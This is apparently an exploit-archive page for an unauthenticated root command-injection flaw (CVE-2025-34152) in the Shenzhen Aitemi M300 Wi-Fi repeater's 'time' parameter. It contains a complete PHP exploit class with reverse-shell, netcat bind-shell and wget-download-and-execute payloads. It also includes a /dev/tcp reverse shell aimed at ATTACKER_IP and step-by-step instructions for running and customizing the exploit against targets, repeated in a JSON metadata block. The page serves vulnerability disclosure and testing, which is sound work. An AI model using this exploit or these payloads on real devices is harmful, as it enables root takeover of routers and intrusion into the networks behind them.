📄 Shenzhen Aitemi M300 Wi-Fi Repeater Remote Code Execution

9.4 / 10

CRITICAL

CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H

Description

Shenzhen Aitemi M300 Wi-Fi Repeater unauthenticated proof of concept remote code execution exploit that leverages the time parameter in protocol.csp...

Visit Original Source

Basic Information

ID PACKETSTORM:215871

Published Feb 19, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Shenzhen Aitemi M300 Wi-Fi Repeater PHP Code Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ebay.com/itm/404211745927 |
=============================================================================================================================================

POC :

[+] General Information
----------------------
- Vulnerability Name: Shenzhen Aitemi M300 Wi-Fi Repeater – Unauthenticated RCE (https://packetstorm.news/files/id/209361/)
- CVE ID: CVE-2025-34152
- Vulnerability Type: Remote Command Injection – Unauthenticated
- Privilege Level: Root
- Severity: Critical (10/10)

2. Vulnerability Description
----------------------------
The Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) contains an unauthenticated
remote command injection vulnerability in the "time" parameter handled by:

protocol.csp?fname=system&opt=time_conf&function=set

The parameter is passed directly into:

date -s "$time"

Because user-supplied input is unsanitized, an attacker can inject backtick-executed
shell commands:

time=`COMMAND`

These commands execute with full root privileges without requiring authentication.

3. Exploitation
----------------
Example malicious injection:

time=`sh -i >& /dev/tcp/ATTACKER_IP/4444 0>&1`

URL-encoded version:

time=%60sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2F4444%200%3E%261%60

The payload is delivered through an unauthenticated POST request.

4. Security Impact
------------------
- Full remote command execution as root
- No authentication required
- No reboot needed
- Immediate full compromise of the device
- Allows uploading, downloading, deleting files
- Enables persistent backdoors
- May give access to the entire network environment

5. Recommendations
------------------
- Update firmware as soon as possible
- Restrict access to port 80
- Place the device behind a firewall/WAF
- Avoid exposing the repeater to WAN environments

===================================================================
6. Full Converted PHP Exploit Code
===================================================================

<?php

class AitemiM300_Advanced {

private $target;
private $port;
private $path;
private $logFile = "exploit-log.txt";

public function __construct($target, $port = 80, $path = "/") {
$this->target = rtrim($target, '/');
$this->port = $port;
$this->path = $path;
}

private function log($txt) {
file_put_contents($this->logFile, "[" . date("Y-m-d H:i:s") . "] $txt\n", FILE_APPEND);
}

private function sendReq($method, $uri, $data = null, $headers = []) {
$url = "http://{$this->target}:{$this->port}{$uri}";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

if ($data) curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
if ($headers) curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$body = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

$this->log("HTTP $method $uri => Code $code");
return ['body' => $body, 'code' => $code];
}

public function check() {

$res = $this->sendReq("GET", "/favicon.ico");

if ($res['code'] !== 200) {
return "SAFE: favicon.ico missing – likely not vulnerable.";
}

$hash = hash("sha256", $res['body']);
if ($hash === "eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee") {
return "✓ Appears: Aitemi M300 device confirmed.";
}

return "UNKNOWN: Unable to verify device identity.";
}

public function exploit($cmd) {

$raw = "`$cmd`";
$enc = urlencode($raw);
$enc = str_replace("+", "%20", $enc);

$data = "fname=system&opt=time_conf&function=set&time=$enc";

$headers = [
"Content-Type: application/x-www-form-urlencoded"
];

return $this->sendReq("POST", "/protocol.csp?", $data, $headers);
}

public function payload_reverse_shell($ip, $port) {
return "sh -i >& /dev/tcp/$ip/$port 0>&1";
}

public function payload_bind_shell($port = 4444) {
return "nc -lp $port -e /bin/sh";
}

public function payload_mips_wget($url) {
return "wget $url -O /tmp/x; chmod +x /tmp/x; /tmp/x";
}

public function payload_pingback($ip) {
return "ping -c 1 $ip";
}

public function run_payload($payload) {
return $this->exploit($payload);
}

}

// Example Usage:
$exp = new AitemiM300_Advanced("192.168.1.1");

echo $exp->check() . "\n";

$payload = $exp->payload_reverse_shell("192.168.1.100", 4444);
$exp->run_payload($payload);

echo "✓ Payload sent...\n";
?>

===================================================================
7. How To Save And Execute The PHP Exploit Code
===================================================================

Follow the steps below to properly save and run the converted PHP exploit code.

1. Saving The Exploit
---------------------
- Open a text editor such as Notepad, Notepad++, Sublime Text, or VSCode.
- Copy the full PHP exploit code block from section 6.
- Save the file as:

aitemi_m300_rce.php

- Make sure the file extension is `.php` and the encoding is UTF‑8.

2. Preparing The Environment
----------------------------
The exploit requires:
- PHP 7.x or PHP 8.x installed.
- cURL support enabled (php‑curl extension).
- Internet / network access to the target device.

Check PHP version:

php -v

Check curl module:

php -m | findstr curl (Windows)
php -m | grep curl (Linux)

3. Running The Exploit (Windows)
--------------------------------
Open Command Prompt or PowerShell:

cd C:\path\to\exploit\
php aitemi_m300_rce.php

4. Running The Exploit (Linux / macOS)
--------------------------------------
Terminal:

cd /path/to/exploit/
php aitemi_m300_rce.php

Run in background:

nohup php aitemi_m300_rce.php &

5. Customizing Payloads
-----------------------
Modify:

$exp = new AitemiM300_Advanced("192.168.1.1");

Reverse shell:

$payload = $exp->payload_reverse_shell("YOUR_IP", 4444);

Bind shell:

$payload = $exp->payload_bind_shell(5555);

MIPS wget payload:

$payload = $exp->payload_mips_wget("http://YOUR_IP/mips.bin");

Execute:

$exp->run_payload($payload);

6. Verifying RCE
----------------
- Reverse shell connection
- Pingback
- exploit-log.txt
- Observed device behavior

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-19T16:32:21",
    "description": "Shenzhen Aitemi M300 Wi-Fi Repeater unauthenticated proof of concept remote code execution exploit that leverages the time parameter in protocol.csp...",
    "published": "2026-02-19T00:00:00",
    "modified": "2026-02-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Shenzhen Aitemi M300 Wi-Fi Repeater Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215871",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-34152"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Shenzhen Aitemi M300 Wi-Fi Repeater PHP Code Exploit                                                                        |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.ebay.com/itm/404211745927                                                                                       |\n    =============================================================================================================================================\n    \n    POC : \n    \n    [+] General Information\n    ----------------------\n    - Vulnerability Name: Shenzhen Aitemi M300 Wi-Fi Repeater \u2013 Unauthenticated RCE (https://packetstorm.news/files/id/209361/)\n    - CVE ID: CVE-2025-34152\n    - Vulnerability Type: Remote Command Injection \u2013 Unauthenticated\n    - Privilege Level: Root\n    - Severity: Critical (10/10)\n    \n    2. Vulnerability Description\n    ----------------------------\n    The Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) contains an unauthenticated\n    remote command injection vulnerability in the \"time\" parameter handled by:\n    \n        protocol.csp?fname=system&opt=time_conf&function=set\n    \n    The parameter is passed directly into:\n    \n        date -s \"$time\"\n    \n    Because user-supplied input is unsanitized, an attacker can inject backtick-executed\n    shell commands:\n    \n        time=`COMMAND`\n    \n    These commands execute with full root privileges without requiring authentication.\n    \n    3. Exploitation\n    ----------------\n    Example malicious injection:\n    \n        time=`sh -i >& /dev/tcp/ATTACKER_IP/4444 0>&1`\n    \n    URL-encoded version:\n    \n        time=%60sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2F4444%200%3E%261%60\n    \n    The payload is delivered through an unauthenticated POST request.\n    \n    4. Security Impact\n    ------------------\n    - Full remote command execution as root\n    - No authentication required\n    - No reboot needed\n    - Immediate full compromise of the device\n    - Allows uploading, downloading, deleting files\n    - Enables persistent backdoors\n    - May give access to the entire network environment\n    \n    5. Recommendations\n    ------------------\n    - Update firmware as soon as possible\n    - Restrict access to port 80\n    - Place the device behind a firewall/WAF\n    - Avoid exposing the repeater to WAN environments\n    \n    ===================================================================\n    6. Full Converted PHP Exploit Code\n    ===================================================================\n    \n    <?php\n    \n    class AitemiM300_Advanced {\n    \n        private $target;\n        private $port;\n        private $path;\n        private $logFile = \"exploit-log.txt\";\n    \n        public function __construct($target, $port = 80, $path = \"/\") {\n            $this->target = rtrim($target, '/');\n            $this->port = $port;\n            $this->path = $path;\n        }\n    \n        private function log($txt) {\n            file_put_contents($this->logFile, \"[\" . date(\"Y-m-d H:i:s\") . \"] $txt\\n\", FILE_APPEND);\n        }\n    \n        private function sendReq($method, $uri, $data = null, $headers = []) {\n            $url = \"http://{$this->target}:{$this->port}{$uri}\";\n            $ch = curl_init($url);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);\n    \n            if ($data) curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\n            if ($headers) curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n    \n            $body = curl_exec($ch);\n            $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\n            curl_close($ch);\n    \n            $this->log(\"HTTP $method $uri => Code $code\");\n            return ['body' => $body, 'code' => $code];\n        }\n    \n        public function check() {\n    \n            $res = $this->sendReq(\"GET\", \"/favicon.ico\");\n    \n            if ($res['code'] !== 200) {\n                return \"SAFE: favicon.ico missing \u2013 likely not vulnerable.\";\n            }\n    \n            $hash = hash(\"sha256\", $res['body']);\n            if ($hash === \"eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee\") {\n                return \"\u2713 Appears: Aitemi M300 device confirmed.\";\n            }\n    \n            return \"UNKNOWN: Unable to verify device identity.\";\n        }\n    \n        public function exploit($cmd) {\n    \n            $raw  = \"`$cmd`\";\n            $enc  = urlencode($raw);\n            $enc  = str_replace(\"+\", \"%20\", $enc);\n    \n            $data = \"fname=system&opt=time_conf&function=set&time=$enc\";\n    \n            $headers = [\n                \"Content-Type: application/x-www-form-urlencoded\"\n            ];\n    \n            return $this->sendReq(\"POST\", \"/protocol.csp?\", $data, $headers);\n        }\n    \n        public function payload_reverse_shell($ip, $port) {\n            return \"sh -i >& /dev/tcp/$ip/$port 0>&1\";\n        }\n    \n        public function payload_bind_shell($port = 4444) {\n            return \"nc -lp $port -e /bin/sh\";\n        }\n    \n        public function payload_mips_wget($url) {\n            return \"wget $url -O /tmp/x; chmod +x /tmp/x; /tmp/x\";\n        }\n    \n        public function payload_pingback($ip) {\n            return \"ping -c 1 $ip\";\n        }\n    \n        public function run_payload($payload) {\n            return $this->exploit($payload);\n        }\n    \n    }\n    \n    // Example Usage:\n    $exp = new AitemiM300_Advanced(\"192.168.1.1\");\n    \n    echo $exp->check() . \"\\n\";\n    \n    $payload = $exp->payload_reverse_shell(\"192.168.1.100\", 4444);\n    $exp->run_payload($payload);\n    \n    echo \"\u2713 Payload sent...\\n\";\n    ?>\n    \n    ===================================================================\n    7. How To Save And Execute The PHP Exploit Code\n    ===================================================================\n    \n    Follow the steps below to properly save and run the converted PHP exploit code.\n    \n    1. Saving The Exploit\n    ---------------------\n    - Open a text editor such as Notepad, Notepad++, Sublime Text, or VSCode.\n    - Copy the full PHP exploit code block from section 6.\n    - Save the file as:\n    \n        aitemi_m300_rce.php\n    \n    - Make sure the file extension is `.php` and the encoding is UTF\u20118.\n    \n    2. Preparing The Environment\n    ----------------------------\n    The exploit requires:\n    - PHP 7.x or PHP 8.x installed.\n    - cURL support enabled (php\u2011curl extension).\n    - Internet / network access to the target device.\n    \n    Check PHP version:\n    \n        php -v\n    \n    Check curl module:\n    \n        php -m | findstr curl   (Windows)\n        php -m | grep curl       (Linux)\n    \n    3. Running The Exploit (Windows)\n    --------------------------------\n    Open Command Prompt or PowerShell:\n    \n        cd C:\\path\\to\\exploit\\\n        php aitemi_m300_rce.php\n    \n    4. Running The Exploit (Linux / macOS)\n    --------------------------------------\n    Terminal:\n    \n        cd /path/to/exploit/\n        php aitemi_m300_rce.php\n    \n    Run in background:\n    \n        nohup php aitemi_m300_rce.php &\n    \n    5. Customizing Payloads\n    -----------------------\n    Modify:\n    \n        $exp = new AitemiM300_Advanced(\"192.168.1.1\");\n    \n    Reverse shell:\n    \n        $payload = $exp->payload_reverse_shell(\"YOUR_IP\", 4444);\n    \n    Bind shell:\n    \n        $payload = $exp->payload_bind_shell(5555);\n    \n    MIPS wget payload:\n    \n        $payload = $exp->payload_mips_wget(\"http://YOUR_IP/mips.bin\");\n    \n    Execute:\n    \n        $exp->run_payload($payload);\n    \n    6. Verifying RCE\n    ----------------\n    - Reverse shell connection  \n    - Pingback  \n    - exploit-log.txt  \n    - Observed device behavior  \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215871",
    "cvss": {
        "score": 9.4,
        "severity": "CRITICAL",
        "vector": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215871/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Shenzhen Aitemi M300 Wi-Fi Repeater Remote Code Execution_PACKETSTORM:215871

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply